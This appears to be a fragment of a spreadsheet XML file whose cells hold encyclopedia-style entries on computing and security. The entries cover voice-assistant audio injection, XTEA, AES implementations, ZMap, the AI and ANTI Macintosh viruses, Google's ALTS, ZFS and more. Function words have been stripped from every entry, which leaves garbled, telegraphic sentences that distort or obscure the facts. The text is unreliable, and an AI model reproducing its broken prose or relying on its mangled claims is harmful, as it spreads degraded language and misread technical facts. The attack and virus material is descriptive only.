considerations. while scientific study uncertainty measured indicators, ongoing analysis provide additional insights future, forensic examination usually subject ongoing review. judgment needs made time case heard, court needs weigh various pieces evidence assess whatever level doubt also acoustic fingerprint acoustic signature speaker recognition references</t>
  </si>
  <si>
    <t>Audio injection</t>
  </si>
  <si>
    <t>audio injection exploitation digital assistants amazon echo, google home apple siri unwanted instructions third party. these services lack authentication reacting user commands, making possible attackers issue activation words commands trigger execution desired actions. injection results include fraud, burglary, data espionage takeover connected systems. approach most digital assistants require activation word trigger complete recording audio analysis spoken commands (e.g. google"). these commands, spoken natural language, processed executed. activation word different manufacturer, often connected product’s name. possible product's owner customize activation word, meaning models react word. processed language analyzed regards voice recognition authorization individual users. result, users audible range device authorizations trigger execute actions. depending functionality, actions range simple actions like music playback controlling lights, security critical sensitive actions opening gates, executing ordering chargeable transactions reading private information. audio injection attacks performed remotely. access audible area digital assistant restricted, attacked increasing distance transmission. either reached overcoming existent acoustic barriers (e.g. vending opening momentary opened window) unusual loud playback amplifiers loudspeakers. with approach possible control digital assistants rooms, floors outside building. digital assistants distinguish whether voice commands directly spoken reproduced loudspeaker system. this means attacks performed devices support audio playback loudspeaker. radio television used mass-attacks, telephones, hands-free systems, digital assistants systems text-to-speech-processing misused. systems accessed randomly, anonymously absence owner, well activated remotely, critical. answering machines automated monitoring function playing message aloud along could used remote precise attacks. examples june 2014 television commercial microsoft depicted actor issuing voice command xbox, causing command interpreted xbox systems room television showing commercial.in december 2016, adam jakowenko showed virtual assistant could activate another using tts-processing.in january 2017, television news coverage child's ordering dollhouse amazon's alexa interface included news anchor patton quoting child. this quotation triggered orders dollhouses viewers coverage alexa devices running. references</t>
  </si>
  <si>
    <t>Windows Hardware Error Architecture</t>
  </si>
  <si>
    <t>windows hardware error architecture (whea) operating system hardware error handling mechanism introduced windows vista windows server 2008 successor machine check architecture (mca) previous versions windows. architecture consists several software components interact hardware firmware given platform handle notify regarding hardware error conditions. collectively, components provide: generic means discovering errors, common error report format errors, preserving error records, error event model based event tracing windows (etw).whea "builds express advanced reporting provide detailed information system errors common reporting structure."whea allows third-party software interact operating system react certain hardware events. example, added running system—a windows server feature known dynamic hardware partitioning—the hardware error component stack notified processor installed.linux supports acpi platform error interface (apei) introduced acpi 5.0. references</t>
  </si>
  <si>
    <t>BACKUP (DOS command)</t>
  </si>
  <si>
    <t>XML firewall</t>
  </si>
  <si>
    <t>firewall specialized device used protect applications exposed based interfaces like wsdl rest scan traffic coming going organization. typically deployed environment firewall often used validate traffic, control access based resources, filter content rate limit requests back-end applications exposed based interfaces. firewalls commonly deployed hardware also found software virtual appliance vmware, amazon ec2. number brands firewall exist often differ based parameters like performance (with without hardware acceleration, bit), scalability (how cluster perform load), security certification (common criteria, fips common), identity support (for saml, oauth, enterprise solutions) extensibility (they support different transport protocols like tibco ems, etc.). firewalling functionality typically embedded inside appliances gateways. also appliance services ws-security representational state transfer</t>
  </si>
  <si>
    <t>XTEA</t>
  </si>
  <si>
    <t>cryptography, xtea (extended tea) block cipher designed correct weaknesses tea. cipher's designers david wheeler roger needham cambridge computer laboratory, algorithm presented unpublished technical report 1997 (needham wheeler, 1997). subject patents.like tea, xtea 64-bit block feistel cipher 128-bit suggested rounds. several differences apparent, including somewhat complex key-schedule rearrangement shifts, xors, additions. implementations this standard source code, adapted reference code released public domain david wheeler roger needham, encrypts decrypts using xtea: changes reference source code minor: reference source code used unsigned long type rather 64-bit clean uint32_t. reference source code const types. reference source code omitted redundant parentheses, using precedence write round function e.g. (v0&lt;&lt;4 v0&gt;&gt;5) k[sum&gt;&gt;11 3];the recommended value "num_rounds" parameter iteration loop feistel-cipher rounds. additionally improve speed, loop unrolled pre-computing values sum+key[]. cryptanalysis 2004, presented related-key differential attack rounds xtea, requiring 220.5 chosen plaintexts time complexity 2115.15 al., 2004).in 2009, presented related-key rectangle attack rounds xtea, breaking rounds previously published cryptanalytic results xtea. paper presents attacks, without weak assumption, corresponds 264.98 bytes data 2126.44 operations, 263.83 bytes data 2104.33 operations respectively. block presented along xtea variable-width block cipher termed block tea, uses xtea round function, block applies cyclically across entire message several iterations. because operates entire message, block property need mode operation. attack full block described (saarinen, 1998), also details weakness block tea's successor, xxtea. also stream cipher that, like xtea, designed simple implement. xxtea block tea's successor. block tea's precursor. references further reading sekar, gautham; mouha, nicky; velichkov, vesselin; preneel, bart (2011). kiayias, (ed.). meet-in-the-middle attacks reduced-round xtea. topics cryptology ct-rsa 2011. lecture notes computer science. vol. 6558. 250–267. doi:10.1007/978-3-642-19074-2_17. isbn 978-3-642-19073-5. retrieved 2018-10-10. moon, dukjae; hwang, kyungdeok; lee, wonil; lee, sangjin; lim, jongin (2002). impossible differential cryptanalysis reduced round xtea tea. fast software encryption. lecture notes computer science. vol. 2365. 49–60. doi:10.1007/3-540-45661-9_4. isbn 978-3-540-44009-3. retrieved 2018-10-10. andem, vikram reddy (2003). cryptanalysis tiny encryption algorithm (pdf) (masters thesis). university alabama, tuscaloosa. retrieved 2018-10-10. saarinen, markku-juhani (1998-08-20). "cryptanalysis block tea". retrieved 2018-10-10. {{cite journal}}: cite journal requires |journal= (help) external links dataflow diagram page advocating xtea providing variety implementations test vectors xtea cryptanalysis tiny encryption algorithm implementation xtea implementation xtea pascal/delphi implementation xtea java implementation xtea rounds) javascript implementation xtea rounds) python implementation xtea linden scripting language (lsl) implementation xtea second life scripting verilog implementation xtea smalltalk implementation xtea postgresql implementation xtea</t>
  </si>
  <si>
    <t>AES implementations</t>
  </si>
  <si>
    <t>there various implementations advanced encryption standard, also known rijndael. libraries rijndael free public private, commercial non-commercial. authors rijndael used provide homepage algorithm. care taken implementing software, particular around side-channel attacks. algorithm operates plaintext blocks bytes. encryption shorter blocks possible padding source bytes, usually null bytes. this accomplished several methods, simplest assumes final byte cipher identifies number null bytes padding added. implementation considerations careful choice must made selecting mode operation cipher. simplest mode encrypts decrypts 128-bit block separately. mode, called electronic code book (ecb), blocks identical encrypted identically; entirely insecure. makes plaintext structure visible ciphertext. selecting modes, using sequential counter block prior encryption (i.e., mode) removing decryption avoids problem. another mode, cipher block chaining (cbc) commonly used modes tls. uses random initialization vector (iv) ensure distinct ciphertexts produced even plaintext encoded multiple times. transmitted clear without jeopardizing security. common practice prepend byte ciphertext, gives decrypter easy access care must taken every encryption operation, since otherwise attacker recover plaintext. current list fips validated cryptographic modules (hosted nist) current list fips validated cryptographic modules validated implementations (hosted nist) most involve commercial implementation algorithms. look "fips-approved algorithms" entry "level description" column followed "aes" specific certificate number. c/asm library libgcrypt wolfssl (previously cyassl) gnutls network security services openssl libressl mbed (previously polarssl) reference original implementation axtls microsoft cryptoapi uses cryptographic service providers offer encryption implementations. microsoft cryptographic provider introduced windows used version microsoft cryptoapi. tiny-aes-c small portable aes128/192/256 (suitable embedded systems) aes-256 byte-oriented portable aes-256 implementation solaris cryptographic framework offers multiple implementations, kernel providers hardware acceleration (using intel instruction set) sparc (using sparc instruction set). available solaris derivatives, solaris openaes portable cryptographic library libtomcrypt modular portable cryptographic toolkit provides developers well known published block ciphers, one-way hash functions, chaining modes, pseudo-random number generators, public cryptography routines. libsodium nacl dust compact implementation aes-128 encryption x86, amd64, arm32 arm64 assembly. msp430 implementation embedded 16-bit microcontroller gladman code optional support intel brian gladman. library botan implemented rijndael since first release 2001 crypto++ comprehensive public-domain implementation encryption hash algorithms. fips validated c/cuda library gkrypt implemented rijndael cuda first release 2012 /.net version .net framework, system.security.cryptography namespace contains fully managed implementation managed wrapper around capi implementation. bouncy castle crypto library crypto/aes package standard library java java cryptography extension, integrated java runtime environment since version 1.4.2 iaik bouncy castle crypto library python pycrypto python cryptography toolkit pycrypto, extended pycryptodome keyczar cryptography toolkit keyczar m2crypto m2crypto complete openssl wrapper python. cryptography python library exposes cryptographic recipes primitives. pynacl python binding libsodium (nacl) javascript sjcl library contains javascript implementations ccm, cbc, modes aes-js portable javascript implementation modes forge javascript implementations cbc, ctr, ofb, cfb, modes asmcrypto javascript implementation popular cryptographic utilities focus performance. supports cbc, cfb, modes. pidcrypt open source javascript library. only supports modes. rust rust implementation. labview labview labview implementation. applications archive compression tools amanda backup peazip pkzip ultraiso winzip file encryption away cryptography uses rijndael algorithm (nist aes) 256-bit data blocks, cipher (counter mode) document picture encryption windows only. gpg4win ncrypt encrypting file systems most encrypting file systems aes, e.g. ntfs disk partition encryption bitlocker (part certain editions windows operating systems) ciphershed diskcryptor filevault (part operating system, also included disk utility makes aes-encrypted drive images) gbde geli (software) librecrypt (discontinued) luks private disk truecrypt (discontinued) veracrypt security communications local area networks ieee 802.11i, amendment original ieee 802.11 standard specifying security mechanisms wireless networks, uses aes-128 mode (ccmp). itu-t g.hn standard, provides create high-speed gigabit/s) local area network using existing home wiring (power lines, phone lines coaxial cables), uses aes-128 encryption. miscellaneous datalocker uses 256-bit mode hardware encryption backup uses aes-128 aes-256 gpg, gpl-licensed, includes aes, aes-192, aes-256 options. ipsec ironkey uses 128-bit 256-bit cbc-mode hardware encryption keepass password safe lastpass linux kernel's crypto api, exposed userspace netlib encryptionizer supports 128/256 cbc, modes file folder encryption windows platform. pidgin (software), plugin allows encryption javascrypt free open-source text encryption tool runs entirely browser, send encrypted text insecure e-mail machine. pyeyecrypt free open-source text encryption tool/gui user-selectable encryption methods pbkdf2 iterations. signal protocol google allo (optional) facebook messenger (optional) signal textsecure whatsapp socialdocs file encryption uses aes256 provide free-online file encryption tool xfire uses aes-128, aes-192 encrypt usernames passwords certain games engines, rockstar advanced game engine used grand theft auto encrypt game assets order deter hacking multiplayer. hardware x86-64 processors include instruction set. zseries mainframes, implemented series assembler opcodes various message security assist facilities installed. sparc core processors include instruction set, used sparc sparc systems. references</t>
  </si>
  <si>
    <t>AES instruction set</t>
  </si>
  <si>
    <t>advanced encryption standard instruction integrated many processors. purpose instruction improve speed security applications performing encryption decryption using advanced encryption standard (aes). they often implemented instructions implementing single round along special version last round slightly different method. side channel attack surface reduced implemented instruction set, compared implemented software only. architecture processors aes-ni intel advanced encryption standard instructions; aes-ni) first major implementation. aes-ni extension instruction architecture microprocessors intel proposed intel march 2008. instructions intel following intel processors support aes-ni instruction set: westmere based processors, specifically: westmere-ep (a.k.a. gulftown xeon 5600-series server model) processors clarkdale processors (except core pentium celeron) arrandale processors (except celeron, pentium, core core i5-4xxm) sandy bridge processors: desktop: except pentium, celeron, core mobile: core core several vendors shipped bios configurations extension disabled; bios update required enable them. bridge processors xeon i3-2115c haswell processors (all except i3-4000m, pentium celeron) broadwell processors (all except pentium celeron) silvermont/airmont processors (all except trail-d trail-m) goldmont (and later) processors skylake (and later) processors several processors support instructions: jaguar processors newer puma processors newer "heavy equipment" processors bulldozer processors piledriver processors steamroller processors excavator processors newer (and later) based processors hardware acceleration architectures support unprivileged processor instructions also available latest sparc processors (t3, forward) latest processors. sparc processor, introduced 2011, user-level instructions implementing rounds. these instructions addition higher level encryption commands. armv8-a processor architecture, announced 2011, including cortex-a53 (but previous processors like cortex also user-level instructions implement rounds. supporting cpus cpus, geode, marvell kirkwood (arm, mv_cesa linux) driver-based accelerated handling instead. (see crypto (linux).) following chips, supporting hardware acceleration, support aes-ni: geode processors via, using padlockvia nehemiah (eden-n) processors esther processors architecture programming information available architecture reference manual armv8, armv8-a architecture profile (section a2.3 "the armv8 cryptographic extension"). armv8-a architecture cryptographic extensions optionally supported cortex-a30/50/70 cores cryptographic hardware accelerators/engines allwinner a10, a20, a30, a31, a80, a83t, using security system broadcom bcm5801/bcm5805/bcm5820 using security processor semiconductors i.mx6 onwards qualcomm snapdragon onwards rockchip rk30xx series onwards samsung exynos series onwards risc-v architecture whilst risc-v architecture include aes-specific instructions, number risc-v chips include integrated co-processors. examples include: dual-core risc-v bits sipeed-m1 support sha256. risc-v architecture based esp32-c well xtensa-based esp32), support aes, sha, rsa, rng, hmac, digital signature flash. bouffalo labs bl602/604 32-bit risc-v supports various variants. power architecture since power_isa_v.2.07, instructions vcipher vcipyherlast implement round directly. z/architecture later mainframe processors support single-opcode (km, kmc) ecb/cbc instructions ibm's cryptoexpress hardware. these single-instruction versions therefore easier intel ones, extended implement algorithms based round functions (such whirlpool grøstl hash functions). other architectures atmel xmega (on-chip accelerator parallel execution, instruction) sparc later processors hardware support several cryptographic algorithms, including aes. cavium octeon mips cavium octeon mips-based processors hardware support several cryptographic algorithms, including using special coprocessor instructions. performance aes-ni performance analyzed, patrick schmid achim roos found "impressive results handful applications already optimized take advantage intel's aes-ni capability". performance analysis using crypto++ security library showed increase throughput approximately 28.0 cycles byte cycles byte aes/gcm versus pentium acceleration. supporting software most modern compilers emit instructions. much security cryptography software supports instruction set, including following notable core infrastructure: apple's filevault full-disk encryption macos 10.10+ nonstop ssh2, nonstop library backbox software tandem nonstop l-series cryptography api: next generation (cng) (requires windows linux's crypto java hotspot network security services (nss) version 3.13 (used firefox google chrome) solaris cryptographic framework solaris onwards freebsd's opencrypto (aesni(4) driver) openssl 1.0.1 gnutls libsodium veracrypt programming language bitlockera fringe instruction involves using block ciphers similarly-structured s-box, using affine isomorphism convert two. camellia accelerated using aes-ni. also advanced vector extensions (avx) clmul instruction instruction (fma3, fma4) rdrand notes references external links intel advanced encryption standard instructions (aes-ni) instruction whitepaper (2.93 mib, pdf) intel</t>
  </si>
  <si>
    <t>AES-GCM-SIV</t>
  </si>
  <si>
    <t>aes-gcm-siv mode operation advanced encryption standard provides similar performance galois/counter mode well misuse resistance event reuse cryptographic nonce. construction defined 8452. about aes-gcm-siv designed preserve privacy integrity even nonces repeated. accomplish this, encryption function nonce, plaintext message, optional additional associated data (a.k.a. aad). event nonce misused (i.e. used once), nothing revealed except case message encrypted multiple times nonce. when happens, attacker able observe repeat encryptions, since encryption deterministic function nonce message. however, beyond that, additional information revealed attacker. reason, aes-gcm-siv ideal choice cases unique nonces cannot guaranteed, multiple servers network devices encrypting messages without coordination. operation like galois/counter mode, aes-gcm-siv combines well-known counter mode encryption galois mode authentication. feature synthetic initialization vector computed galois field multiplication using construction called polyval little-endian variant galois/counter mode's ghash). polyval combination nonce, plaintext, additional data, different combination. polyval defined gf(2128) polynomial: {\displaystyle x^{128}+x^{127}+x^{126}+x^{121}+1} note ghash defined "reverse" polynomial: {\displaystyle x^{128}+x^{7}+x^{2}+x+1} this change provides efficiency benefits little-endian architectures. implementations implementations aes-gcm-siv available, among others, following languages: java python rust also authenticated encryption galois/counter mode stream cipher external links 8452: aes-gcm-siv: nonce misuse-resistant authenticated encryption biu: webpage aes-gcm-siv mode operation references</t>
  </si>
  <si>
    <t>ZOC (software)</t>
  </si>
  <si>
    <t>popular computer-based terminal emulator telnet software client microsoft windows apple macintosh macos operating systems supports telnet, modem, isdn, serial, tapi, rlogin means communication. terminal emulator supports xterm emulation full colors, meta-keys local printing, vt102, vt220 several types ansi well wyse, tvi, tn3270, sun's cde. supports full keyboard remapping, scripting rexx languages, support named pipes.zoc commercial software developed markus schmidt emtec innovative software germany, firm produces software various aspects communications telephone, isdn like. price 2018 us$80, free evaluation period days; downloaded evaluation emtec several shareware distribution sites. emtec produces associated independent telecommunications programmes tcp/ip, modem, isdn etc.: pyrotrans, package including client server, pyrobatchftp, programmable tool. history first released os/2 october 1993 (v0.95) windows november 1996 (v3.02). 1997 selected runner-up os/2 e-zine! readers' choice awards. released version 3.11 january 1999. support os/2 discontinued release version supported version features protocols secure shell (ssh v1/v2) based openssh public/private authentication, port forwarding (tunneling) smart card support. telnet (rfc-telnet, pure sockets, ssl-telnet) modem serial port tapi (windows modem) isdn capi v2.0 (including x.25 x.31 support) rlogin file transfer protocols: ascii, x-modem, y-modem, z-modem, kermit, scp, sftp terminals emulated linux (xterm) console-like vt52, vt100, vt102, vt220, vt420, vt520 ansi-bbs, ansi-sco, avatar like tn3270 tn5250 sun-cde wyse (tvi 920, 925, 950) xterm full support line graphics using font automation scripting rexx language scripting (fully featured programming language extensions control terminal emulator) rexx interpreter supplied zoc, another interpreter specified configuring applescript support access internal script commands macos recorded login scripts, macro commands, automatic replies incoming text supported windows version, allowing communication server user interface tabbed interface multiple concurrent connections overview display show thumbnails open sessions keys macros, remappable keyboard, user button online chat support configurable display. also comparison clients references external links official website</t>
  </si>
  <si>
    <t>AI (computer virus)</t>
  </si>
  <si>
    <t>computer virus infects executable files. virus loaded memory running infected file modifies computer's time operation corrupts program overlay files. seem work executables reliably infect standard files. adds useless bytes infected files references external links computer viruses (a), probert encyclopedia symantec</t>
  </si>
  <si>
    <t>ZNC</t>
  </si>
  <si>
    <t>network bouncer bnc. detach client actual server, also selected channels. multiple clients different locations connect single account simultaneously therefore appear nickname irc. supports transport layer security connections ipv6. written licensed apache-2.0 license. main program, already features multiple users, channel playback buffers transparent bouncing, extended using modules. modules written python, perl, tcl, c++. available modules comprise logging functionality, blowfish encryption, user channel management, away functionality, partyline more. popular module webadmin: provides manage users channels conveniently using browser. also supports ident spoofing oidentd.znc development since july 2004, alternative psybnc kept crashing author, releases made regularly. received favorable reviews, especially comparison psybnc, active community irc. mid-2009, znc's popularity among iphone users increased notification modules colloquy growl published. since 2012, clients started integrate znc: sending channel buffers client, uses timestamp indicating message received, client shows instead time client received buffer. this functionality implemented protocol extension. references external links official website "znc". freecode. #znc connect libera.chat #znc efnet</t>
  </si>
  <si>
    <t>ALGOL 68C</t>
  </si>
  <si>
    <t>algol imperative computer programming language, dialect algol developed stephen bourne michael program cambridge algebra system (camal). initial compiler written princeton syntax compiler (psyco, edgar irons) implemented mathewman cambridge. algol later used chaos capability-based security computer university cambridge 1971. other early contributors andrew birrell walker. subsequent work done compiler bourne left cambridge university 1975. garbage collection added, code base still running emulated os/mvt using hercules. algol compiler generated output zcode, register-based intermediate language, could either interpreted compiled native executable. this ability interpret compile zcode encouraged porting algol many different computing platforms. aside computer, compiler ported systems including conversational monitor system (cms), tops-10, zilog z80. popular culture early predecessor compiler used bourne write first game life programs pdp-7 display.various liverpool software gazette issues detail implementation. compiler required memory run; hence z80's memory actually small compiler. algol programs cross-compiled larger computer, system/370 mainframe computer. algol unix stephen bourne subsequently reused algol 68's else case esac clauses common unix bourne shell, in's syntax changed, removed, replaced done avoid conflict utility). after cambridge, bourne spent nine years bell labs version unix (seventh edition unix) team. well developing bourne shell, ported algol unix pdp-11-45 included special option unix debugger advanced debugger (adb) obtain stack backtrace programs written algol 68c. here extract unix edition manual pages: name debugger synopsis [-w] objfil corfil [...] commands [...] $modifier miscellaneous commands. available modifiers are: [...] algol stack backtrace. address given taken address current frame (instead r4). count given first count frames printed. algol extensions algol below sampling notable extensions: automatic op:= operator, e.g. upto, downto until loop-clauses; displacement operator (:=:=) andf, thef syntactic elements. separate compilation environ clause using clause scopes checked bounds formal-declarers code edoc clause embedding zcode environ using clauses separate compilation algol done using environ using clauses. environ saves complete environment point appears. separate module written starting using clause effectively inserted first module point environ clause appears. environ using useful top-down style programming, contrast bottom-up style implied traditional library mechanisms. these clauses kind inverse #include found programming language, import found python. purpose environ mechanism allow program source broken manageable sized pieces. necessary parse shared source file once, unlike #include found programming language include file needs parsed source file includes example environ clause file called mylib.a68: begin constant number 120; variable environ example1; mode matrix [dim, dim]real; type definition matrix number environ example2; print((a number)) example using clause file called usemylib.a68: using example2 from "mylib" begin matrix example print((a number)); declared mylib.a68 print((2 m1)); also declared mylib.a68 environ example3; environs nested restrictions language standard algol algol flex variable length arrays mode string implemented without flex parallel clause implemented nonstandard transput others...a translator–compiler algol available pdp-10, system/360 several computers. references external links official website cambridge algol historical roster computer languages includes publication references. transportation algol gardner, university essex march 1977 (from decsystem-10) running algol install algol emulated system</t>
  </si>
  <si>
    <t>ALTS</t>
  </si>
  <si>
    <t>application layer transport security (alts) google developed authentication encryption system used securing remote procedure call (rpc) within google machines. google started development 2007, tailored modification tls. background alts whitepaper published december 2017. according development started 2007. time dominant application layer protocols (tls published 2008), supported many legacy algorithms poor security standards. google full control machines needed secure transport rpcs, deployment systems relatively easy, google developers could afford designing system scratch. another requirement deemed system necessary different trust models: tls, server side committed domain name (and corresponding naming scheme), google needed identity (i.e. rpc) used multiple naming schemes, order simplify microservice replication, load balancing rescheduling hosts. details handshake protocol alts handshake protocol based authenticated diffie-hellman exchange scheme, enjoying perfect forward secrecy (access current keys compromise future security) session resumption (noticeable speedups protocol first session parties). unlike tls, alts parties server client certificate proving respective identities. certificate chains trusted signing service verification key, leaf elliptic curve diffie-hellman key, eventually used exchange. elliptic curve used exchange curve25519.the handshake protocol consists four messages, sent plaintext: clientinit, initiated client, contains client's certificate, list available cipher suites, session resumption attempt; serverinit, sent server response, contains certificate, chosen cipher suite, optionally encrypted resumption ticket; serverfinished, sent server (concatenated previous message alts default implementation), contains handshake authenticator, i.e. hmac known bitstring using calculated session key; clientfinished, sent client, contains handshake authenticator, similarly serverfinished.once parties computed session (record protocol whitepaper), start encrypting traffic symmetric encryption algorithm 128-bit aes, using mostly mode operation. older machines, google developed used.the handshake protocol verified using proverif formal verification tool. session resumption order avoid repeating computationally expensive operations, alts supports session resumption. resumption tickets created either server client, used handshake protocol, parties hold resumption ticket, indexed resumption identifier. resumption secret used derive next session key, authenticator encapsulated (independent) resumption ticket/identifier. perfect forward secrecy perfect forward secrecy (pfs) enabled default alts; however, supported. instead using inherent algorithm, alts achieves frequently rotating certificates, short lifespan hours; moreover, enabled, also enabled session resumption, deriving encryption keys resumption ticket using pseudorandom function. also transport layer security quic google cloud platform references</t>
  </si>
  <si>
    <t>AMD Turbo Core</t>
  </si>
  <si>
    <t>turbo core a.k.a. core performance boost (cpb) dynamic frequency scaling technology implemented allows processor dynamically adjust control processor operating frequency certain versions processors allows increased performance needed maintaining lower power thermal parameters normal operation. turbo core technology implemented beginning phenom microprocessors based microarchitecture. turbo core available a-series accelerated processing units.amd turbo core similar intel turbo boost, another dynamic processor frequency adjustment technology used increase performance, well powernow!, used dynamically adjust laptop processor's operating frequencies order decrease power consumption (saving battery life), reduce heat, lower noise. powernow! used decrease processor frequency, whereas turbo core used increase processor frequency. background decide processor's clock speed, processor stress tested determine maximum speed processor maximum amount power allowed reached, called thermal design power tdp. reported customers would complain processors rarely consumed rated tdp, meant consumers come close power consumed maximum stress testing. parameter called average power (acp) used address issue. defines average power expected consumed regular use, whereas gives maximum power consumed. power consumed important factor considering thermal limits determining power dissipation. turbo core similar dynamic processor frequency adjustment technologies take advantage average power consumed less maximum design limits, allowing frequency (and accompanying power heat) increased short periods time without exceeding design limits. features advantages turbo core include: additional clock speed available cores active, meaning cores boost time. potentially even higher boost states available half cores active, since fewer active cores require less power generate less heat. governed power draw, temperature, performance increase available warmer environments, maximum frequency dependent workload.with ryzen processors, introduced extra auto-overclocking features: precision boost tries processor highest frequency allowed moment, constrained cooling power supply. changes frequency increments. extended frequency range unlocks default boost ranges systems better cooling. processors supporting turbo core opteron ryzen epyc some phenom cpus also cool'n'quiet (desktop cpus) powernow! (laptop cpus) powertune (graphics) dynamic frequency scaling intel speedstep (cpus) intel turbo boost turbo button references</t>
  </si>
  <si>
    <t>ANDVT</t>
  </si>
  <si>
    <t>advanced narrowband digital voice terminal (andvt) secure voice terminal bandwidth secure voice communications throughout u.s. department defense. devices andvt family include an/usc-43 tactical terminal (tacterm), ky-99a miniaturized terminal (minterm), ky-100 airborne terminal (airterm). andvt uses lpc-10 voice compression. functions minterm similar tacterm; updated design includes improved modular architecture, reduced size. minterm lightweight, low-power, single channel, half-duplex, narrowband/wideband/wireline terminal providing secure voice data communications full distribution remote rekey capabilities. minterm certified secure traffic secret. minterm improvements include following: concurrent voice data modes enable users connect data equipment voice handsets. vinson (ky-57/58) mode operation allows interoperability minterm vinson wideband comsec equipment. improved satcom performance latest lpc-10 algorithm (v58) enhanced provide high-quality secure narrowband voice military handsets maintain quality intelligibility noisy acoustical environments.the airterm lightweight, self-contained secure voice data terminal provides secure half-duplex voice, digital data, analog data, remote-keying capabilities transmission radio circuits wireline media. wideband/narrowband terminal interoperates tacterm, minterm, vinson, single channel ground airborne radio system (sincgars). airterm accepts classified analog voice information uses lpc-10 kbit/s narrowband voice modes continuously variable slope delta (cvsd) modulation kbit/s kbit/s wideband voice modes. airterm provides connectors, similar functional pinouts, vinson wideband operational modes. also encryption systems fnbdt references external links andvt picture</t>
  </si>
  <si>
    <t>ZMap (software)</t>
  </si>
  <si>
    <t>zmap free open-source security scanner developed faster alternative nmap. zmap designed information security research used white black purposes. tool able discover vulnerabilities impact, detect affected devices. using gigabit second network bandwidth, zmap scan entire ipv4 address space minutes single port. with gigabit connection, zmap scan complete scan five minutes. operation zmap iterates techniques utilized predecessor, nmap, altering scanning method areas. nmap sends individual signals address waits reply. replies return, nmap compiles database keep track responses, process slows scanning process. contrast, zmap uses cyclic multiplicative groups, allows zmap scan space roughly 1,300 times faster nmap. zmap software takes every number 232-1 creates iterative formula ensures possible 32-bit numbers visited pseudorandom order. building initial list numbers every address takes upfront time, fraction required aggregate list every sent received probe. this process ensures zmap starts sending probes different ips, accidental denial service could occur abundance transmissions would converge subnet time.zmap also speeds scanning process sending probe every address default, whereas nmap resends probe detects connection delay fails reply. this results addresses missed typical scan, processing billions address, potential devices targeted cyberattackers, acceptable tolerance. usage zmap used vulnerability detection exploitation.the application used port scans estimate power outages hurricane sandy 2013. developers zmap, zakir durumeric, used software determine computer's online state, vulnerabilities, operating system, services. zmap also used detect vulnerabilities universal plug play devices search weak public keys https website logs. also banner grabbing nmap openvas references external links official website</t>
  </si>
  <si>
    <t>ANTI (computer virus)</t>
  </si>
  <si>
    <t>anti computer virus affecting apple macintosh computers running classic versions system first macintosh virus create additional resources within infected files; instead, patches existing code resources.the commonly encountered strains anti subtle effects, thus exist spread indefinitely without noticed antivirus application run. virus, cannot spread multifinder running, prevents infecting system later versions well system running multifinder. mode operation anti infects applications opposed system files), therefore spread infected application run. when application calls openresfile function, virus searches computer applications fulfill following criteria: they code (application code segment) resources resource code begins instruction (generally main resource given application) application already infected anti size code plus size virus less equal 32,768 bytesall matching applications infected appending virus code resource adding corresponding entry application's jump table. variants there three strains anti, following differences: anti-a: 1,344 bytes plus byte jump table entry. first version isolated, france february 1989. searches anti-b strains converts anti-variant. anti-b: 1,144 bytes plus byte jump table entry. discovered france september 1990. despite later discovery date, believed earliest version virus. also known anti-0. anti-variant: discovered september 1990. result anti-a finding modifying anti-b strain. causes computer hang infected application run. also known anti-ange. payload strains carry payload related floppy disk access. when infected application calls mountvol function, virus checks disk actually floppy disk, reads first sector (512 bytes) track then virus compares text offset bytes sector string $16+"%%s". text matches, virus executes code offset sector jsr. disks containing matching string known exist, practice payload effect. based search expected string specific location disk, danny schwendener zurich hypothesised anti intended form part copy protection scheme, would detect reorganisation caused standard filesystem copy. side effects during infection, anti clears resource attributes associated code cause infected application memory, particularly older macintoshes roms. mitigation unlike preceding macintosh viruses, anti detected specific resource names ids; slower string comparison search required order find signatures associated virus.the university hamburg's virus test center recommends detection antivirus application disinfectant (version later), interferon, virus detective, virus mcafee recommends virex. however, loss resource attributes means removal virus restore original application pristine state; restoring virus-free backup completely effective. also extended copy protection, later controversial copy-protection malware references external links virus encyclopedia, anti macintosh virus thierry delettre's announcement compuserve (includes speculations later found incorrect)</t>
  </si>
  <si>
    <t>ZFS</t>
  </si>
  <si>
    <t>(previously: zettabyte file system) combines file system volume manager. began part microsystems solaris operating system 2001. large parts solaris including published open source license opensolaris around years 2005, placed closed source license oracle corporation acquired 2009/2010. during 2005 2010, open source version ported linux, (continued maczfs) freebsd. 2010, illumos project forked recent version opensolaris, continue development open source project, including zfs. 2013, openzfs founded coordinate development open source zfs. openzfs maintains manages core code, organizations using maintain specific code validation processes required integrate within systems. openzfs widely used unix-like systems. overview management stored data generally involves aspects: physical volume management block storage devices hard drives cards organization logical block devices seen operating system (often involving volume manager, raid controller, array manager, suitable device driver), management data files stored logical block devices file system data storage). example: raid array hard drives caching disk controlled intel's system, part chipset firmware built desktop computer. windows user sees single volume, containing ntfs-formatted drive data, ntfs necessarily aware manipulations required (such reading from/writing cache drive rebuilding raid array disk fails). management individual devices presentation single device distinct management files held apparent device.zfs unusual because, unlike storage systems, unifies roles acts volume manager file system. therefore, complete knowledge physical disks volumes (including condition status, logical arrangement volumes), also files stored them. designed ensure (subject suitable hardware) data stored disks cannot lost physical errors misprocessing hardware operating system, events data corruption happen time, complete control storage system used ensure every step, whether related file management disk management, verified, confirmed, corrected needed, optimized, storage controller cards separate volume file managers cannot achieve. also includes mechanism dataset pool-level snapshots replication, including snapshot cloning described freebsd documentation "most powerful features", features "even file systems snapshot functionality lack". very large numbers snapshots taken, without degrading performance, allowing snapshots used prior risky system operations software changes, entire production ("live") file system fully snapshotted several times hour, order mitigate data loss user error malicious activity. snapshots rolled back "live" previous file system states viewed, even large file systems, leading savings comparison formal backup restore processes. snapshots also cloned form independent file systems. pool level snapshot (known "checkpoint") available allows rollback operations affect entire pool's structure, remove entire datasets. history microsystems 2010) 1987, at&amp;t corporation announced collaborating project merge popular unix variants market time: berkeley software distribution, unix system xenix. this became unix system release (svr4). project released name solaris, became successor sunos (although sunos 4.1.x micro releases retroactively named solaris 1).zfs designed implemented team jeff bonwick, bill moore matthew ahrens. announced september 2004, development started 2001. source code integrated main trunk solaris development october 2005, released developers part build opensolaris november 2005. june 2006, announced included mainstream 6/06 update solaris 10.solaris originally developed proprietary software, microsystems early commercial proponent open source software june 2005 released solaris codebase cddl license founded opensolaris open-source project. solaris 6/06 ("u2"), added file system next years frequently updated features. ported linux, (continued maczfs) freebsd, open source license. name point said stand "zettabyte file system", 2006, name longer considered abbreviation. file system store quadrillion zettabytes (zb). september 2007, netapp sued claiming infringed netapp's patents write anywhere file layout. counter-sued october year claiming opposite. lawsuits ended 2010 undisclosed settlement. later development ported versions began appear 2005. after acquisition oracle 2010, oracle's version became closed source development 